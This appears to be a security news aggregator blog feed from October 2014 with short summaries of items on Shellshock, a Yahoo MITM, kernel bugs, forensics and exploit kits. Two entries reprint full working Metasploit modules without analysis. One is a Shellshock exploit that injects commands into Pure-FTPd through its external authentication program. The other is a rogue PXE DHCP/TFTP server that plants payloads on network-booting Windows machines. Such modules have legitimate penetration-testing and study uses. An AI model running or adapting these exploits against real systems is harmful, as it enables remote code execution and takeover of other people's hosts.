The Shellshock Aftershock for NAS Administrators

October 1, 2014, 2:00 pm

FireEye has been monitoring Shellshock-related attacks closely since the vulnerability was first made public last week. Specifically, FireEye has observed attackers attempting to exploit the BASH remote code injection vulnerability against Network Attached Storage systems (NAS). These attacks result in the hackers having a root level remote shell, gaining full access to the contents of the NAS. The observed targets have been primarily located in Japan and Korea with one additional target observed in the US. The only known data on the attackers currently are that two of their malware host servers are located in Korea and the US.

more here..........http://www.fireeye.com/blog/technical/2014/10/the-shellshock-aftershock-for-nas-administrators.html

↧

Verifying Chinese MITM of Yahoo

October 1, 2014, 5:41 pm

≫ Next: xfs directory hash ordering bug

≪ Previous: The Shellshock Aftershock for NAS Administrators

GreatFire.org sent out a tweet yesterday saying that “Yahoo appears to under Man-in-the-middle attack in China. 3rd case of country-wide MITM, after Google, Github”.

Mashable later ran a story called “China Appears to Attack Yahoo in Latest Censorship of Hong Kong Protests”, where Lorenzo Franceschi-Bicchierai write:

In what's almost unprecedented, China appears to be targeting Yahoo with what's called a "man-in-the-middle attack." With such an attack, connections to Yahoo.com, which are normally encrypted, would be vulnerable to snooping, and Chinese censors could also block search terms or specific Yahoo links with the goal of preventing Chinese netizens from accessing information about the protests in Hong Kong.

In this blog post we verify that there is an ongoing Man-in-the-Middle (MITM) attack by analyzing two different packet capture files.

more here............http://www.netresec.com/?page=Blog&month=2014-10&post=Verifying-Chinese-MITM-of-Yahoo

↧

xfs directory hash ordering bug

October 1, 2014, 8:18 pm

≫ Next: Two New Attack Vectors to Aggravate the Android addJavascriptInterface RCE Issue (CVE-2014-7224)

≪ Previous: Verifying Chinese MITM of Yahoo

Another kernel bug which did not get a CVE yet, but should be considered
to get one (sorry for the late notification):

https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c88547a8119e3b581318ab65e9b72f27f23e641d

Basically it allows a local user to corrupt a xfs filesystem by just
creating directories.

more here...........http://permalink.gmane.org/gmane.comp.security.oss.general/14116

↧

Two New Attack Vectors to Aggravate the Android addJavascriptInterface RCE Issue (CVE-2014-7224)

October 2, 2014, 12:01 am

≫ Next: Metasploit: Pure-FTPd External Authentication Bash Environment Variable Code Injection

≪ Previous: xfs directory hash ordering bug

The Android addJavascriptInterface Remote Code Execution (RCE) issue is a disaster in Android ecosystem (see background knowledge here and here). CVE had assigned CVE-2012-6636 for the basic issue, and CVE-2013-4710 for attack vectors introduced in some devices, and CVE-2014-1939 for the default searchBoxJavaBridge_ vector in specific Android versions. For the defense side, developers are recommended to not invoke the addJavascriptInterface API, and meantime call removeJavascriptInterface("searchBoxJavaBridge_") to avoid the by-default impact.

Today we identify two new attack vectors, "accessibility" and "accessibilityTraversal", by default introduced by android/webkit/AccessibilityInjector.java.

more here..........https://daoyuan14.github.io/news/newattackvector.html

↧

Metasploit: Pure-FTPd External Authentication Bash Environment Variable Code Injection

October 2, 2014, 12:04 am

≫ Next: Metasploit: PXE Exploit Server

≪ Previous: Two New Attack Vectors to Aggravate the Android addJavascriptInterface RCE Issue (CVE-2014-7224)

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Ftp
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
'Description' => %q(
This module exploits the code injection flaw known as shellshock which
leverages specially crafted environment variables in Bash. This exploit
specifically targets Pure-FTPd when configured to use an external
program for authentication.
),
'Author' =>
[
'Stephane Chazelas', # Vulnerability discovery
'Frank Denis', # Discovery of Pure-FTPd attack vector
'Spencer McIntyre' # Metasploit module
],
'References' =>
[
['CVE', '2014-6271'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
],
'Payload' =>
{
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => :printf
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => :printf
}
]
],
'DefaultOptions' =>
{
'PrependFork' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'))
register_options(
[
Opt::RPORT(21),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end

def check
# this check method tries to use the vulnerability to bypass the login
username = rand_text_alphanumeric(rand(20) + 1)
random_id = (rand(100) + 1)
command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
if send_command(username, command) =~ /^2\d\d ok./i
return CheckCode::Safe if banner !~ /pure-ftpd/i
disconnect

command = "echo auth_ok:0; echo end"
if send_command(username, command) =~ /^5\d\d login authentication failed/i
return CheckCode::Vulnerable
end
end
disconnect

CheckCode::Safe
end

def execute_command(cmd, _opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
username = rand_text_alphanumeric(rand(20) + 1)
send_command(username, cmd)
end

def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
end

execute_cmdstager(linemax: 500)
handler
end

def send_command(username, cmd)
cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
connect
send_user(username)
password_result = send_pass(cmd)
disconnect
password_result
end
end

//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

↧

Metasploit: PXE Exploit Server

October 2, 2014, 12:07 am

≫ Next: ChopShop 4.0- Protocol Analysis/Decoder Framework

≪ Previous: Metasploit: Pure-FTPd External Authentication Bash Environment Variable Code Injection

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/proto/tftp'
require 'rex/proto/dhcp'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::TFTPServer
include Msf::Auxiliary::Report

def initialize
super(
'Name' => 'PXE Exploit Server',
'Description' => %q{
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into memory that
reads the hard drive; placing the payload on the hard drive of any Windows
partition seen.

Note: the displayed IP address of a target is the address this DHCP server
handed out, not the "normal" IP address the host uses.
},
'Author' => [ 'scriptjunkie' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 4500,
'DisableNops' => 'True',
},
'Platform' => 'win',
'DisclosureDate' => 'Aug 05 2011',
'Targets' =>
[
[ 'Windows Universal',
{
}
],
],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'DefaultTarget' => 0
)

register_options(
[
OptInt.new('SESSION', [ false, 'A session to pivot the attack through' ])
], self.class)

register_advanced_options(
[
OptString.new('TFTPROOT', [ false, 'The TFTP root directory to serve files from' ]),
OptString.new('SRVHOST', [ false, 'The IP of the DHCP server' ]),
OptString.new('NETMASK', [ false, 'The netmask of the local subnet', '255.255.255.0' ]),
OptBool.new('RESETPXE', [ true, 'Resets the server to re-exploit already targeted hosts', false ]),
OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ])
], self.class)
end

def exploit
if not datastore['TFTPROOT']
datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
end
datastore['FILENAME'] = "update1"
datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them!

# Prepare payload
print_status("Creating initrd")
initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom'))
uncompressed = Rex::Text.ungzip(initrd)
payl = payload.generate
uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl
initrd = Rex::Text.gzip(uncompressed)

# Meterpreter attack
if framework.sessions.include? datastore['SESSION']
client = framework.sessions[datastore['SESSION']]
if not client.lanattacks
print_status("Loading lanattacks extension...")
client.core.use("lanattacks")
else
if datastore['RESETPXE']
print_status("Resetting PXE attack...")
client.lanattacks.dhcp.reset
end
end

print_status("Loading DHCP options...")
client.lanattacks.dhcp.load_options(datastore)
0.upto(4) do |i|
print_status("Loading file #{i+1} of 5")
if i < 4
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
else
contents = initrd
end
client.lanattacks.tftp.add_file("update#{i}",contents)
end
print_status("Starting TFTP server...")
client.lanattacks.tftp.start
print_status("Starting DHCP server...")
client.lanattacks.dhcp.start
print_status("pxesploit attack started")
while (true) do
begin
# get stats every 20s
select(nil, nil, nil, 20)
client.lanattacks.dhcp.log.each do |item|
print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} "+
"(#{Rex::Socket.addr_ntoa(item[1])})")
report_note({
:type => 'PXE.client',
:data => item[0].unpack('H2H2H2H2H2H2').join(':')
})
end
rescue ::Interrupt
print_status("Stopping TFTP server...")
client.lanattacks.tftp.stop
print_status("Stopping DHCP server...")
client.lanattacks.dhcp.stop
print_status("PXEsploit attack stopped")
return
end
end
end

# normal attack
print_status("Starting TFTP server...")
@tftp = Rex::Proto::TFTP::Server.new
@tftp.set_tftproot(datastore['TFTPROOT'])
@tftp.register_file('update4',initrd)
@tftp.start

print_status("Starting DHCP server...")
@dhcp = Rex::Proto::DHCP::Server.new( datastore )
@dhcp.report do |mac, ip|
print_status("Serving PXE attack to #{mac.unpack('H2H2H2H2H2H2').join(':')} "+
"(#{Rex::Socket.addr_ntoa(ip)})")
report_note({
:type => 'PXE.client',
:data => mac.unpack('H2H2H2H2H2H2').join(':')
})
end
@dhcp.start
print_status("pxesploit attack started")

# Wait for finish..
@tftp.thread.join
@dhcp.thread.join
print_status("pxesploit attack completed")
end

end

//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

↧

ChopShop 4.0- Protocol Analysis/Decoder Framework

October 2, 2014, 1:38 am

≫ Next: Recovering Evidence from SSD Drives: Understanding TRIM, Garbage Collection and Exclusions

≪ Previous: Metasploit: PXE Exploit Server

ChopShop is a MITRE developed framework to aid analysts in the creation and execution of pynids based decoders and detectors of APT tradecraft.

more here...........https://github.com/MITRECND/chopshop

↧

Recovering Evidence from SSD Drives: Understanding TRIM, Garbage Collection and Exclusions

October 2, 2014, 1:40 am

≫ Next: Windows 10–Active Memory Dump

≪ Previous: ChopShop 4.0- Protocol Analysis/Decoder Framework

We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives.

more here.........http://forensic.belkasoft.com/en/ssd-2014

↧

Windows 10–Active Memory Dump

October 2, 2014, 4:29 am

≫ Next: CVE-2013-7331 and Exploit Kits

≪ Previous: Recovering Evidence from SSD Drives: Understanding TRIM, Garbage Collection and Exclusions

Windows 10 brings a new type of memory dump: Active Memory Dump. I love this feature, just what I’ve been waiting for.

To analyze the Windows 10 Technical Preview Dump files ensure you have the symbols from http://msdn.microsoft.com/en-us/windows/hardware/gg463028.aspx

This memory dmp is much more compact that a complete memory dump, while containing “active memory” in kernel and user mode space.

more here.........http://chentiangemalc.wordpress.com/2014/10/02/windows-10active-memory-dump/

↧

CVE-2013-7331 and Exploit Kits

October 2, 2014, 7:51 am

≫ Next: Scan the internet for Autonomous Systems that can perform IP spoofing

≪ Previous: Windows 10–Active Memory Dump

Thanks to EKWatcher and his decoding skills saving me a lot of time.

As we can see more and more of those "XMLDOM" checks in exploit kits i decided to write here some of the checks spotted. This is a fast moving area and it will be hard to keep up to date with this, but this may give an idea of how it's being used.

more here........http://malware.dontneedcoffee.com/2014/10/cve-2013-7331-and-exploit-kits.html

↧

Scan the internet for Autonomous Systems that can perform IP spoofing

October 2, 2014, 7:58 am

≫ Next: Seriously! NSSLabs responds to Palo Alto Networks claims about latest NGFW group test results

≪ Previous: CVE-2013-7331 and Exploit Kits

I have always been interested in IP spoofing. I would say it's something "elegant", and it's a neat way to show how the Internet works, or rather how there are some inherent flaws with it. My greatest geek pride is a hack based on IP spoofing and source IP-port guessing, that allowed me to make players shit carrots while walking.

more here........http://meat.pisto.horse/2014/10/find-autonomous-systems-with-ip-spoofing.html

↧

Seriously! NSSLabs responds to Palo Alto Networks claims about latest NGFW group test results

October 2, 2014, 8:04 am

≫ Next: CVE-2014-7284 (NGRO Bug): Lack of randomness in Linux kernel network secrets

≪ Previous: Scan the internet for Autonomous Systems that can perform IP spoofing

We don’t follow up every NSS Labs test with a blog response to a vendor, but after the fun and
games following our recent BDS test, we find ourselves in a similar position. This time it is Palo Alto Networks blogging about our NGFW group test, the results of which were published last week and can be found here.

While Lee Klarich’s blog was very carefully worded, he never actually addressed the main issue at hand: Palo Alto Networks NGFW misses several critical evasions that leave its customers at risk. The blog did, however, contain some serious inaccuracies that I would like to address

more here..........https://www.nsslabs.com/blog/seriously

↧

CVE-2014-7284 (NGRO Bug): Lack of randomness in Linux kernel network secrets

October 2, 2014, 10:30 am

≫ Next: The Unpatchable Malware That Infects USBs Is Now on the Loose

≪ Previous: Seriously! NSSLabs responds to Palo Alto Networks claims about latest NGFW group test results

In the late 1990s and early 2000s, many operating systems were found to have flawed TCP/IP sequence number generators, and this was identified as a serious security vulnerability (see, for example, Strange Attractors and TCP/IP Sequence Number Analysis - One Year Later). Since that time, generators have been improved, it has been assumed that the problem was dealt with, and most people stopped thinking about these kinds of vulnerabilities.

However, we have identified a problem with Linux kernel, the result of which was that secret random seed values (e.g., net_secret, syncookie_secret, inet_ehash_secret, etc.) were never initialized on some systems.

more here..........http://secondlookforensics.com/ngro-linux-kernel-bug/

↧

The Unpatchable Malware That Infects USBs Is Now on the Loose

October 2, 2014, 12:18 pm

≫ Next: Cross Site Scripting – Attacking the Honeywell Falcon XLWeb part two

≪ Previous: CVE-2014-7284 (NGRO Bug): Lack of randomness in Linux kernel network secrets

It’s been just two months since researcher Karsten Nohl demonstrated an attack he called BadUSB to a standing-room-only crowd at the Black Hat security conference in Las Vegas, showing that it’s possible to corrupt any USB device with insidious, undetectable malware. Given the severity of that security problem—and the lack of any easy patch—Nohl has held back on releasing the code he used to pull off the attack. But at least two of Nohl’s fellow researchers aren’t waiting any longer.

more here.............http://www.wired.com/2014/10/code-published-for-unfixable-usb-attack/

↧

Cross Site Scripting – Attacking the Honeywell Falcon XLWeb part two

October 2, 2014, 12:22 pm

≫ Next: Website Security: A Case of SEO Poisoning

≪ Previous: The Unpatchable Malware That Infects USBs Is Now on the Loose

On Tuesday Outpost24 released information on CVE-2014-2717 – Honeywell Authentication Bypass. Later, the same day we were contacted by Mr. Bolivar, the second vulnerability researcher mentioned in the initial ICS CERT advisory, who invited us to include information with his full disclosure. It has been confirmed that all attacks presented in this disclosure including the modified versions of the original advisory have been already solved by Honeywell.

more here..........http://www.outpost24.com/update-to-advisory-on-honeywell-scada/

↧

Website Security: A Case of SEO Poisoning

October 2, 2014, 12:47 pm

≫ Next: NoSQL SSJI Authentication Bypass

≪ Previous: Cross Site Scripting – Attacking the Honeywell Falcon XLWeb part two

There are so many ways your website can be co-opted by hackers for many different reasons, targeting the value created via your SEO is highly attractive. It provides an attacker the opportunity to cheat the system by quickly benefiting from your raw traffic, your audience. In this post we will share details of a recent case in which an attacker leveraged a websites organic traffic to funnel, steal, traffic to their desired pages.

more here...............http://blog.sucuri.net/2014/10/website-security-a-case-of-seo-poisoning.html

↧

NoSQL SSJI Authentication Bypass

October 2, 2014, 9:22 pm

≫ Next: Reading the Silk Road configuration

≪ Previous: Website Security: A Case of SEO Poisoning

Following my previous post on SSJI (Server Side JavaScript Injection), I received many questions requesting more details and techniques on how applications that use a big data back end may be vulnerable and If I could give some viable examples. I figured we could start with an login page authentication bypass that gives a very clear example to the problem.

more here...........http://blog.imperva.com/2014/10/nosql-ssji-authentication-bypass.html

↧

Reading the Silk Road configuration

October 3, 2014, 3:55 am

≫ Next: Right-winger explains what's wrong with ComputerCop

≪ Previous: NoSQL SSJI Authentication Bypass

Many of us believe it wasn't the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using "parallel construction", meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn't true.

Today, Brian Krebs released data from the defense team that seems to confirm the "parallel construction" theory. I thought I'd write up a technical discussion of what was found.

more here............http://blog.erratasec.com/2014/10/reading-silk-road-configuration.html#.VC6AL_ldWSo

↧

Right-winger explains what's wrong with ComputerCop

October 3, 2014, 4:31 am

≫ Next: The domain 0427d7.se with no readable text is valued at $8.6 Million according to appraisepage.com

≪ Previous: Reading the Silk Road configuration

The EFF has a good article on ComputerCop. Police departments have lashed back, saying the EFF is an "ultra-liberal organization that is not in any way credible on this". While it's true the EFF leans heavily to the left, I'm a right-winger -- and I agree with them in this case. Maybe the police will find my right-wing criticisms of ComputerCop more believable.

more here............http://blog.erratasec.com/2014/10/right-winger-explains-whats-wrong-with.html#.VC6IsvldWSo

↧

The domain 0427d7.se with no readable text is valued at $8.6 Million according to appraisepage.com

October 3, 2014, 4:46 am

≫ Next: PayPal Inc Bug Bounty Issue #70 France - Persistent (Escape Shopping) Mail Vulnerability

≪ Previous: Right-winger explains what's wrong with ComputerCop

Torrent sites link to 0427d7.se then malware. According to appraisepage.com 0427d7.se was registered 1 year 7 months ago. It has a alexa rank of #1,018 in the world. It is a domain having .se extension. It is estimated worth of $ 8,676,720.00 and have a daily income of around $ 8,034.00.

appraisepage.com reference link here...........http://www.appraisepage.com/domain/0427d7.se

here is a virustotal scan of the aforementioned link.......https://www.virustotal.com/ro/url/653b12ceddc84f57527c469b77485550fb615708e2c36b15cd5d9838c9932fb0/analysis/

↧